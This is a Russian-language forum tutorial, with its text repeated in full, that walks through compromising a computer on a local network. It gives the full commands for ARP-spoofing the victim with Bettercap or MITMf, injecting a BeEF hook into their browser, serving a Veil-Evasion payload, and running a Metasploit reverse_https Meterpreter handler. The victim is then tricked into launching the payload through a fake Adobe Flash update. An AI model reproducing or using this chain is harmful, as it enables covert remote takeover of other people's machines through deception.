Всем привет.
Сегодня я хочу рассказать как можно используя связку инструментов, получить доступ к удаленной машине в сегменте локальной сети.
Данный материал предназначен для аудитории которая владеет навыками пользователя в среде линукс, так же есть понимания топологии сетей.
Для этого нам понадобиться:
1.Veil-Evasion.
2.Metasploit.
3.Beef.
4 Bettercap ( Mitmf тоже подойдет ).
Я не буду подробно останавливаться на установке и использовании Veil-Evasion ,
кто не знаком с данным инструментом, у нас на форуме эту тему подробно описали,вот ссылка:
https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/
Metasploit и Beef стоят в самом дистрибутиве кали.
Bettercap устанавливаем командой apt-get install bettercap
Кто предпочитает mitmf, то иногда связка mitmf+Beef не корректно работает:
лечиться это следующей заплаткой
easy_install -U pip
pip install Twisted==15.5.0
Отдельно хочу отметить инструмент для тестирования на проникновения Beef,
это сокращение от Browser Exploitation Framework (фреймворк эксплуатации браузеров).
Он позволяет выжать максимум из внедрения JS-кода.
Я считаю что на данный момент это лучший инструмент для проведения XSS-атак.
А сейчас давайте приступим к практической реализации.
1. Запускаем фраемворк Beef , его можно запустить как из меню так и из консоли, если запускать из консоли то заходим в каталог используя следующую команду:
cd /usr/share/beef-xss/
./beef
Консоль не закрываем!
Далее открываем браузер и в строке вводим следующий адрес
Login: beef
Pasword: beef
после не хитрых манипуляций попадаем в графический интерфейс управления фраемворка.
2.Далее открываем новую консоль и запускаем bettercap, в моем случае строка будет выглядеть следующим образом:
sudo bettercap -T 192.168.0.109 --proxy-module injectjs --js-url "
где адрес 192.168.0.109 -эта машина в отношении которой производиться тестирование.
адрес 192.168.0.102 -это адрес машины с которой мы атакуем.
Консоль не закрываем!
Если кто не знает, как узнать свой ip, то делается это командой ifconfig.
Кто предпочитает пользоваться инструментом mitmf, то строка будет выглядеть следующим образом:
python mitmf.py -i wlan0 --target 192.168.0.109 --gateway 192.168.0.15 --arp --spoof --inject --js-url
wlan0-это интерфейс
192.168.0.15 это адрес роутера, узнать его можно командой route -n
Далее нам нужно сгенерировать полезную нагрузку, для этого будем использовать инструмент Veil-Evasion.
Еще раз повторюсь, по данной ссылке:
https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/
вы можете ознакомится с установкой, а так же, там подробно описано как создать нужный нам файл.
После того как сгенерировали файл , нам нужно запустить сервер.
я это делал в том же каталоге где была сгенерирована полезная нагрузка, следующей командой
python -m SimpleHTTPServer 8081
консоль не закрываем!
Где 8081 это порт на котором у нас будет крутится сервер.(порт выбирайте произвольно, не обязательно брать такой как у меня.)
Следующим шагом будет запуск метасплойта,(нужно же нам принимать чем то данные, от полезной нагрузки).
Это можно сделать двумя способами, самым простым на мой взгляд это в новой консоли написать строчку следующего содержания,в моем случае это будет выглядеть так
msfconsole -r /usr/share/veil-output/handlers/load_flash_handler.rc
Для тех кто не ищет легких путей:
запускаем метасплойт командой: msfconsole
далее вводим:
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.0.102 (свой внутренний IP )
set LPORT 4444 (вводим порт на котором будет слушаться полезная нагрузка, не путать с портом сервера!!!)
exploit
Консоль не закрываем!
ПО ИТОГУ У НАС ДОЛЖНО БЫТЬ ОТКРЫТЫ ЧЕТЫРЕ КОНСОЛИ.
Сейчас давайте вернемся к нашему фраемворку Beef, перед нами как вы видите, расположен графический интерфейс.
Обратите внимание на крайнюю колонку ,слева сверху, там отображаются ip машин у которых браузеры, уязвимы к атаке xcc, и наш beef их подцепил.
Дальше, мы выбираем наш подцепленный браузер и переходим во вкладку Commands.
Находим там пункт Social Engineering, далее Fake Flash Update, кликаем на нем, и перед нами откроется окно где вместо ip по умолчанию, нужно будет вставить наши данные.
В моем случае это выглядит таким образом :
Далее в нижнем правом углу нажимаем на кнопку Execute.
Если вы все сделали верно, то на машине у жерты появиться окно для обновления Adobe Flash Player.Как только жертва запустит обновление, у нас откроется сессия.
На этом пока всё, спасибо за внимание.
Сегодня я хочу рассказать как можно используя связку инструментов, получить доступ к удаленной машине в сегменте локальной сети.
Данный материал предназначен для аудитории которая владеет навыками пользователя в среде линукс, так же есть понимания топологии сетей.
Для этого нам понадобиться:
1.Veil-Evasion.
2.Metasploit.
3.Beef.
4 Bettercap ( Mitmf тоже подойдет ).
Я не буду подробно останавливаться на установке и использовании Veil-Evasion ,
кто не знаком с данным инструментом, у нас на форуме эту тему подробно описали,вот ссылка:
https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/
Metasploit и Beef стоят в самом дистрибутиве кали.
Bettercap устанавливаем командой apt-get install bettercap
Кто предпочитает mitmf, то иногда связка mitmf+Beef не корректно работает:
лечиться это следующей заплаткой
easy_install -U pip
pip install Twisted==15.5.0
Отдельно хочу отметить инструмент для тестирования на проникновения Beef,
это сокращение от Browser Exploitation Framework (фреймворк эксплуатации браузеров).
Он позволяет выжать максимум из внедрения JS-кода.
Я считаю что на данный момент это лучший инструмент для проведения XSS-атак.
А сейчас давайте приступим к практической реализации.
1. Запускаем фраемворк Beef , его можно запустить как из меню так и из консоли, если запускать из консоли то заходим в каталог используя следующую команду:
cd /usr/share/beef-xss/
./beef
Консоль не закрываем!
Далее открываем браузер и в строке вводим следующий адрес
Ссылка скрыта от гостей
Login: beef
Pasword: beef
после не хитрых манипуляций попадаем в графический интерфейс управления фраемворка.
2.Далее открываем новую консоль и запускаем bettercap, в моем случае строка будет выглядеть следующим образом:
sudo bettercap -T 192.168.0.109 --proxy-module injectjs --js-url "
Ссылка скрыта от гостей
"где адрес 192.168.0.109 -эта машина в отношении которой производиться тестирование.
адрес 192.168.0.102 -это адрес машины с которой мы атакуем.
Консоль не закрываем!
Если кто не знает, как узнать свой ip, то делается это командой ifconfig.
Кто предпочитает пользоваться инструментом mitmf, то строка будет выглядеть следующим образом:
python mitmf.py -i wlan0 --target 192.168.0.109 --gateway 192.168.0.15 --arp --spoof --inject --js-url
Ссылка скрыта от гостей
wlan0-это интерфейс
192.168.0.15 это адрес роутера, узнать его можно командой route -n
Далее нам нужно сгенерировать полезную нагрузку, для этого будем использовать инструмент Veil-Evasion.
Еще раз повторюсь, по данной ссылке:
https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/
вы можете ознакомится с установкой, а так же, там подробно описано как создать нужный нам файл.
После того как сгенерировали файл , нам нужно запустить сервер.
я это делал в том же каталоге где была сгенерирована полезная нагрузка, следующей командой
python -m SimpleHTTPServer 8081
консоль не закрываем!
Где 8081 это порт на котором у нас будет крутится сервер.(порт выбирайте произвольно, не обязательно брать такой как у меня.)
Следующим шагом будет запуск метасплойта,(нужно же нам принимать чем то данные, от полезной нагрузки).
Это можно сделать двумя способами, самым простым на мой взгляд это в новой консоли написать строчку следующего содержания,в моем случае это будет выглядеть так
msfconsole -r /usr/share/veil-output/handlers/load_flash_handler.rc
Для тех кто не ищет легких путей:
запускаем метасплойт командой: msfconsole
далее вводим:
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.0.102 (свой внутренний IP )
set LPORT 4444 (вводим порт на котором будет слушаться полезная нагрузка, не путать с портом сервера!!!)
exploit
Консоль не закрываем!
ПО ИТОГУ У НАС ДОЛЖНО БЫТЬ ОТКРЫТЫ ЧЕТЫРЕ КОНСОЛИ.
Сейчас давайте вернемся к нашему фраемворку Beef, перед нами как вы видите, расположен графический интерфейс.
Обратите внимание на крайнюю колонку ,слева сверху, там отображаются ip машин у которых браузеры, уязвимы к атаке xcc, и наш beef их подцепил.
Дальше, мы выбираем наш подцепленный браузер и переходим во вкладку Commands.
Находим там пункт Social Engineering, далее Fake Flash Update, кликаем на нем, и перед нами откроется окно где вместо ip по умолчанию, нужно будет вставить наши данные.
В моем случае это выглядит таким образом :
Ссылка скрыта от гостей
Ссылка скрыта от гостей
Далее в нижнем правом углу нажимаем на кнопку Execute.
Если вы все сделали верно, то на машине у жерты появиться окно для обновления Adobe Flash Player.Как только жертва запустит обновление, у нас откроется сессия.
На этом пока всё, спасибо за внимание.
Последнее редактирование: